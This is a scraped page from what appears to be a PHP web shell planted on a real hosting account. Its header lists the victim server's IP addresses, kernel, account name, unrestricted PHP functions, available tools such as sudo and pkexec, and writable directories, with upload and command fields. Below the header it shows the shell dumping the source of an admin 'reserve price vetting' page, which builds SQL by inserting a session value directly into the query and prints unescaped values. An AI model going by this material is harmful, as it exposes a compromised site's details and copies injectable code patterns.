Private
Server IP : 192.124.249.33  /  Your IP : 66.248.200.33
Web Server : Apache
System : Linux 141.134.66.148.host.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els6.x86_64 #1 SMP Fri Sep 13 13:42:20 UTC 2024 x86_64
User : tarangglobal ( 1001)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/tarangglobal/public_html/cyber/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/tarangglobal/public_html/cyber/admin/contract_vetting.php
<?php require_once('pdoconfig.php');
$off_id=$_SESSION['poster_id'];
$rsrv=$_REQUEST['rsrv_id'];
//echo $rsrv;
?>
<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	<meta name="description" content="Materia - Admin Template">
	<meta name="keywords" content="materia, webapp, admin, dashboard, template, ui">
	<meta name="author" content="solutionportal">
	<!-- <base href="/"> -->
	<title>Reserve Price Vetting</title>
	
	<link rel="stylesheet" href="fonts/ionicons/css/ionicons.min.css">
	<link rel="stylesheet" href="fonts/font-awesome/css/font-awesome.min.css">
	<!-- Plugins -->
	<link rel="stylesheet" href="styles/plugins/c3.css">
	<link rel="stylesheet" href="styles/plugins/waves.css">
	<link rel="stylesheet" href="styles/plugins/perfect-scrollbar.css">
	
	<!-- Css/Less Stylesheets -->
	<link rel="stylesheet" href="styles/bootstrap.min.css">
	<link rel="stylesheet" href="styles/main.min.css">
<link href='http://fonts.googleapis.com/css?family=Roboto:400,500,700,300' rel='stylesheet' type='text/css'>
<!-- Match Media polyfill for IE9 -->
<!--[if IE 9]> <script src="scripts/ie/matchMedia.js"></script>  <![endif]--> 
<style>
.form-control {
	border:1px solid#ddd;
}
.table-1 td{
	padding:5px;
	border:1px solid#ddd;
}
.active{
	background-color: rgb(58, 57, 57) !important;
}
</style>
</head>
<body id="app" class="app off-canvas">
	<!-- #Start header -->
	<?php include('_header.php');?>
	<!-- #end header -->
	<!-- main-container -->
	
	
	<div class="main-container clearfix">
		<!-- main-navigation -->
		<?php include('_left-menu.php');?>
		<!-- #end main-navigation -->
		<!-- content-here -->
		<div class="content-container" id="content">
			<!-- dashboard page -->
			<div class="page page-dashboard">
				<div class="page-wrap">
					<div class="row">
						<!-- dashboard header -->
						<div class="col-md-12">
							<div class="dash-head clearfix mt30 mb20">
								<div class="left">
									<h4 class="mb5 text-light" style="font-weight:bold;">Contract Discussion</h4>
								</div>
								<div class="right mt10">
									<h5 class="text-bold mb0 mt5"><a href="contract_vetting.php?act=add">Add New Record</a></h5>
								</div>
							</div>
						</div>
					</div> <!-- #end row -->
					 <!-- #end row -->
                       	<div class="row">
						<?php 
						$act=$_REQUEST['act'];
						$catid=$_REQUEST['rsrv_id'];
						
						if(isset($_REQUEST['rsrv_id']))
						{
							
							$sqlu="select * from (select temp.*, contract_type.contTyp_id sec_id,contract_type.contTyp_desc section_name 
								from (select contract_type.* from contract_type where isnull(level) or level=0 ) temp								
								left join contract_type on temp.contTyp_id =contract_type.level) contTyp_id_sec_id, reserve_price, station_master, officer_master								
								where contTyp_id_sec_id.contTyp_id = reserve_price.cntrct_type and contTyp_id_sec_id.sec_id = reserve_price.sec_id
								and reserve_price.station_id=station_master.st_id and reserve_price.by_ofcr=officer_master.off_id";
							$res= $action->select($sqlu);
							foreach ($res as $id=>$row){
							
									$rsrv_id=$row['rsrv_id'];
									$station=$row['st_name'];
									$cntrct=$row['contTyp_desc']."(".$row['section_name'].")";
									$rsrv=$row['rsrv_price'];
									$approved=$row['approved'];
									$frm1=$row['from_dt'];
									$to1=$row['to_dt'];
									$by=$row['by_ofcr'];
							        $remark=$row['remark']; 
							        
							        $frm=date('d-m-Y',strtotime($frm1));
									$to=date('d-m-Y',strtotime($to1));
							}
						}
						?>
						<?php if($act=='add' || $act=='edit' || $act=='del'){?>
						<div class="col-md-12">
						<div class="col-md-6" style="margin:auto;float:none;">	
						
						<form method="post" action="manage_rsrv_price_act.php" enctype="multipart/form-data" name="myForm">
							<input name="act" type="hidden" value="<?=$act?>"/>	
				            <input name="catid" type="hidden" value="<?=$catid?>"/>
				             <input name="redirect" type="hidden" value="reserve_price_vetting.php"/>
							<div style="width:100%;float:left;background-color:#fff;padding:15px;">
								<div class="col-md-6" style="margin-bottom:10px;">
									<label>Station</label>
									<select class="form-control" name="station" readonly>
										<option value="0">-- Select Station--</option>
										<?php 
											$sql1="select * from station_master";
											$res=$action->select($sql1);
											foreach ($res as $id=>$row){
										?>
										<option value="<?=$row['st_id'];?>" <?php if($row['st_name']==$station) { echo "Selected"; }?>><?=$row['st_name'];?></option>
										<?php } ?>
									</select>
								</div>
								<div class="col-md-6" style="margin-bottom:10px;">
									<label>Contract Type</label>
									<select class="form-control" name="contract" readonly>
										<option value="0">-- Select Contract Type--</option>
										<?php 
											$sql2="select temp.*, contract_type.contTyp_id sec_id,contract_type.contTyp_desc section_name from( select contract_type.* from contract_type where isnull(level) or level=0 ) temp left join contract_type on temp.contTyp_id =contract_type.level order by contTyp_id";
											$res=$action->select($sql2);
											foreach ($res as $id=>$row){
													
											if ($row['sec_id'])
											{
												$pval=$row['contTyp_id']."|".$pval=$row['sec_id'];
												$pdesc=$row['contTyp_desc']."(".$row['section_name'].")";	
											}
											else
											{
												$pval=$row['contTyp_id'];
												$pdesc=$row['contTyp_desc'];		
											}
										?>
										<option value="<?=$pval;?>" <?php if($pdesc==$cntrct) { echo "Selected"; }?>><?=$pdesc;?></option>
										<?php } ?>
									</select>
								</div>
								<div class="col-md-6" style="margin-bottom:10px;">
									<label>Proposed Reserve Price</label>
									<input type="text" class="form-control" readonly placeholder="Proposed Reserve Price" name="rsrv_price" id="rsrv_price" value="<?=$rsrv;?>"/>
								</div>
								<div class="col-md-6" style="margin-bottom:10px;">
									<label>Vetted Reserve Price</label>
									<input type="text" class="form-control"  placeholder="Vetted Reserve Price" name="approved" id="approved" value="<?=$approved;?>"/>
								</div>
								<div class="col-md-6" style="margin-bottom:10px;">
									<label>From Date</label>
									<input type="text" class="form-control" readonly placeholder="From Date" name="from" id="from" value="<?=$frm;?>"/>
								</div>
								<div class="col-md-6" style="margin-bottom:10px;">
									<label>To Date</label>
									<input type="text" class="form-control" readonly placeholder="To Date" name="to" id="to" value="<?=$to;?>"/>
								</div>
								<div class="col-md-6" style="margin-bottom:10px;display:none">
									<label>By Officer</label>
									<input type="text" class="form-control" placeholder="By Officer" value="<?=($by=='')?$off_id:$by;?>" name="by_ofcr" id="by_ofcr"/>
								</div>		
								<div class="col-md-12" style="margin-bottom:10px;">
									<label>Remarks</label>
									<textarea class="form-control" readonly  name="remark" id="remark"><?=$remark;?></textarea>
								</div>	
								<div class="col-md-12" style="text-align:center;margin-top:20px;">
									 <?php if($act=='add'){?>
										<button class="btn btn-primary mr5 waves-effect" type="submit" value="add" id="btn-add">Save</button>
									 <?php } 
									 else if($act=='edit')
									 { ?>
										<button class="btn btn-primary mr5 waves-effect" type="submit" value="edit" id="btn-add">Approve vett</button>
									 <a href="reserve_price_vetting.php" class="btn btn-primary mr5 waves-effect">Cancel</a>
									 <?php } ?>
								</div>
							</div>
							</form>
						
						</div>
						<?php } ?>
		                </div> 
                        <div class="row">
						<div class="col-md-12">
							<div style="width:100%;float:left;margin-top:20px;padding:15px;background-color:#fff;">
								<h4 class="mb5 text-light" style="font-weight:bold;margin:0px;width:auto;float:left;display:None;">List of Officers</h4>
								
								<table style="width:auto;float:right;margin-right:0px;margin-bottom:10px;">
									<tr><form method="post"><td style="padding-right:5px;"><input name="search" type="text" class="form-control" value="<?=$search;?>"/></td><td><button name="Submit1" type="submit" value="submit" class="btn btn-primary mr5 waves-effect waves-effect">Search</button></td></form></tr>
								</table>
								<table style="width:100%;float:left;" class="table-1"> 
									<tr style="background:#f2f2f2;">
										<td style="width:50px;">#</td>
										<td>Station</td>
										<td>Contract type</td>
										<td>Proposed Reserve Price</td>
										<td>Vetted Reserve Price</td>
										<td>From Date</td>
										<td>To Date</td>
										<td>By Officer</td>
										<td>Action</td>
									</tr>
									<?php
								
									
									$sql="select *,reserve_price.rsrv_id rsrvid from (select temp.*, contract_type.contTyp_id sec_id,contract_type.contTyp_desc section_name from 
									(select contract_type.* from contract_type where isnull(level) or level=0 ) temp 
									left join contract_type 
									on temp.contTyp_id =contract_type.level) contTyp_id_sec_id, reserve_price, station_master, officer_master, vetting_resrvprice where contTyp_id_sec_id.contTyp_id = reserve_price.cntrct_type and contTyp_id_sec_id.sec_id = reserve_price.sec_id and reserve_price.station_id=station_master.st_id and reserve_price.by_ofcr=officer_master.off_id and vetting_resrvprice.off_id=$off_id ";
									//echo $sql;
									$res= $action->select($sql);
									$i=1;
									foreach ($res as $id=>$row){
									$station=$row['st_name'];
									$cntrct=$row['contTyp_desc']."(".$row['section_name'].")";
									$rsrv=$row['rsrv_price'];
									$approved=$row['approved'];
									$frm=$row['from_dt'];
									$to=$row['to_dt'];
									$by=$row['off_name'];
									?>
									<tr>
										<td><?=$i++;?></td>
										<td><?=$station;?></td>
										<td><?=$cntrct;?></td>
										<td><?=$rsrv;?></td>
										<td><?=$approved;?></td>
										<td><?=$frm;?></td>
										<td><?=$to;?></td>
										<td><?=$by;?></td>
										<td><a href="reserve_price_vetting.php?rsrv_id=<?=$row['rsrvid'];?>&act=edit" class="btn btn-primary mr5 waves-effect waves-effect" style="padding:0px 10px;">Vett</a></td>
										
									
									</tr>
									<?php } ?>
								</table>
								
								
							</div>
						</div>
					</div>
									
				</div> <!-- #end page-wrap -->
			</div>
			<!-- #end dashboard page -->
		</div>
	</div>
	
	<!-- theme settings -->
	<div class="site-settings clearfix hidden-xs">
		<div class="settings clearfix">
			<div class="trigger ion ion-settings left"></div>
			<div class="wrapper left">
				<ul class="list-unstyled other-settings">
					<li class="clearfix mb10">
						<div class="left small">av Horizontal</div>
						<div class="md-switch right">
							<label>
								<input type="checkbox" id="navHorizontal"> 
								<span>&nbsp;</span> 
							</label>
						</div>
						
						
					</li>
					<li class="clearfix mb10">
						<div class="left small">Fixed Header</div>
						<div class="md-switch right">
							<label>
								<input type="checkbox"  id="fixedHeader"> 
								<span>&nbsp;</span> 
							</label>
						</div>
					</li>
					<li class="clearfix mb10">
						<div class="left small">av Full</div>
						<div class="md-switch right">
							<label>
								<input type="checkbox"  id="navFull"> 
								<span>&nbsp;</span> 
							</label>
						</div>
					</li>
				</ul>
				<hr/>
				<ul class="themes list-unstyled" id="themeColor">
					<li data-theme="theme-zero" class="active"></li>
					<li data-theme="theme-one"></li>
					<li data-theme="theme-two"></li>
					<li data-theme="theme-three"></li>
					<li data-theme="theme-four"></li>
					<li data-theme="theme-five"></li>
					<li data-theme="theme-six"></li>
					<li data-theme="theme-seven"></li>
				</ul>
			</div>
		</div>
	</div>
	<!-- #end theme settings -->
	
<script>
$(document).ready(function(){
function vett(){
    alert("Hello"); 
    }
    });
</script>
	<!-- Dev only -->
	<!-- Vendors -->
	<script src="scripts/vendors.js"></script>
	<script src="scripts/plugins/d3.min.js"></script>
	<script src="scripts/plugins/c3.min.js"></script>
	<script src="scripts/plugins/screenfull.js"></script>
	<script src="scripts/plugins/perfect-scrollbar.min.js"></script>
	<script src="scripts/plugins/waves.min.js"></script>
	<script src="scripts/plugins/jquery.sparkline.min.js"></script>
	<script src="scripts/plugins/jquery.easypiechart.min.js"></script>
	<script src="scripts/plugins/bootstrap-rating.min.js"></script>
	<script src="scripts/app.js"></script>
	<script src="scripts/index.init.js"></script>
		
</body>
</html>
Private